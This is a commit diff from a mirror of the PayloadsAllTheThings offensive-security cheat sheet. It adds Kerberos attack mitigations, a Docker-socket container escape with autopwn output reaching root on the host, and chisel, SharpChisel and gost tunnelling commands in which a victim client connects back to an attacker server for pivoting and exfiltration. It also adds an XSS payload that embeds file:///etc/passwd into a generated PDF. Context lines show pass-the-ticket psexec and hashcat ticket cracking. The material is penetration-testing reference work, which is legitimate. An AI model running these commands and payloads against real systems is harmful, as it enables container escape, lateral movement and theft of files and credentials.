mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
Active Directory - Mitigations
This commit is contained in:
parent
74325476a0
commit
ecf29c2cbe
@ -715,6 +715,11 @@ root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi veloci
|
||||
Converting kirbi => ccache
|
||||
```
|
||||
|
||||
|
||||
Mitigations:
|
||||
* Hard to detect because they are legit TGT tickets
|
||||
* Mimikatz generate a golden ticket with a life-span of 10 years
|
||||
|
||||
### Pass-the-Ticket Silver Tickets
|
||||
|
||||
Forging a TGS require machine accound password (key) or NTLM hash from the KDC
|
||||
@ -734,6 +739,9 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
|
||||
root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
|
||||
|
||||
### Kerberoasting
|
||||
|
||||
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
||||
@ -772,7 +780,7 @@ Then crack the ticket with hashcat or john
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
* Have a very long password for your accounts with SPNs (> 25 characters)
|
||||
* Have a very long password for your accounts with SPNs (> 32 characters)
|
||||
* Make sure no users have SPNs
|
||||
|
||||
### KRB_AS_REP Roasting
|
||||
@ -834,6 +842,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
|
||||
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
|
||||
|
||||
### Pass-the-Hash
|
||||
|
||||
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
||||
@ -1595,6 +1606,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
||||
|
||||
## References
|
||||
|
||||
* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
|
||||
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
||||
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
|
||||
* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
|
||||
@ -1660,4 +1672,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
||||
* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation)
|
||||
* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/)
|
||||
* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/)
|
||||
* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
|
||||
* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
|
||||
* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html)
|
@ -33,6 +33,31 @@ curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Conte
|
||||
curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start
|
||||
```
|
||||
|
||||
Exploit using [brompwnie/ed](https://github.com/brompwnie/ed)
|
||||
|
||||
```powershell
|
||||
root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true
|
||||
[+] Hunt dem Socks
|
||||
[+] Hunting Down UNIX Domain Sockets from: /var/run/
|
||||
[*] Valid Socket: /var/run/docker.sock
|
||||
[+] Attempting to autopwn
|
||||
[+] Hunting Docker Socks
|
||||
[+] Attempting to Autopwn: /var/run/docker.sock
|
||||
[*] Getting Docker client...
|
||||
[*] Successfully got Docker client...
|
||||
[+] Attempting to escape to host...
|
||||
[+] Attempting in TTY Mode
|
||||
chroot /host && clear
|
||||
echo 'You are now on the underlying host'
|
||||
chroot /host && clear
|
||||
echo 'You are now on the underlying host'
|
||||
/ # chroot /host && clear
|
||||
/ # echo 'You are now on the underlying host'
|
||||
You are now on the underlying host
|
||||
/ # id
|
||||
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
|
||||
```
|
||||
|
||||
|
||||
## Open Docker API Port
|
||||
|
||||
@ -146,4 +171,5 @@ $ docker run --rm cve-2019-5736:malicious_image_POC
|
||||
- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
|
||||
- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
|
||||
- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
|
||||
- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
|
||||
- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
|
||||
- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/)
|
@ -12,6 +12,8 @@
|
||||
* [Metasploit](#metasploit)
|
||||
* [sshuttle](#sshuttle)
|
||||
* [chisel](#chisel)
|
||||
* [SharpChisel](#sharpchisel)
|
||||
* [gost](#gost)
|
||||
* [Rpivot](#rpivot)
|
||||
* [RevSocks](#revsocks)
|
||||
* [plink](#plink)
|
||||
@ -170,6 +172,40 @@ user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:
|
||||
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
|
||||
```
|
||||
|
||||
### SharpChisel
|
||||
|
||||
A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel
|
||||
|
||||
```powershell
|
||||
user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com"
|
||||
================================================================
|
||||
server : run the Server Component of chisel
|
||||
-p 8080 : run server on port 8080
|
||||
--key "private": use "private" string to seed the generation of a ECDSA public and private key pair
|
||||
--auth "user:pass" : Creds required to connect to the server
|
||||
--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
|
||||
--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight.
|
||||
|
||||
user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks
|
||||
```
|
||||
|
||||
## Gost
|
||||
|
||||
> Wiki English : https://docs.ginuerzh.xyz/gost/en/
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/ginuerzh/gost
|
||||
cd gost/cmd/gost
|
||||
go build
|
||||
|
||||
# Socks5 Proxy
|
||||
Server side: gost -L=socks5://:1080
|
||||
Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true
|
||||
|
||||
# Local Port Forward
|
||||
gost -L=tcp://:2222/192.168.1.1:22 [-F=..]
|
||||
```
|
||||
|
||||
## Rpivot
|
||||
|
||||
Server (Attacker box)
|
||||
@ -305,4 +341,5 @@ unzip ngrok-stable-linux-amd64.zip
|
||||
* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
|
||||
* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
|
||||
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
|
||||
* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
|
||||
* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
|
||||
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
@ -33,6 +33,7 @@
|
||||
* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
|
||||
* [SSRF exploiting Redis](#ssrf-exploiting-redis)
|
||||
* [SSRF to XSS](#ssrf-to-xss)
|
||||
* [SSRF from XSS](#ssrf-from-xss)
|
||||
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
||||
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
||||
* [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)
|
||||
@ -426,6 +427,25 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple
|
||||
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
|
||||
```
|
||||
|
||||
## SSRF from XSS
|
||||
|
||||
### Using an iframe
|
||||
|
||||
The content of the file will be integrated inside the PDF as an image or text.
|
||||
|
||||
```html
|
||||
<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
|
||||
```
|
||||
|
||||
### Using an attachment
|
||||
|
||||
Example of a PDF attachment using HTML
|
||||
|
||||
1. use `<link rel=attachment href="URL">` as Bio text
|
||||
2. use 'Download Data' feature to get PDF
|
||||
3. use `pdfdetach -saveall filename.pdf` to extract embedded resource
|
||||
4. `cat attachment.bin`
|
||||
|
||||
## SSRF URL for Cloud Instances
|
||||
|
||||
### SSRF URL for AWS Bucket
|
||||
|
Loading…
Reference in New Issue
Block a user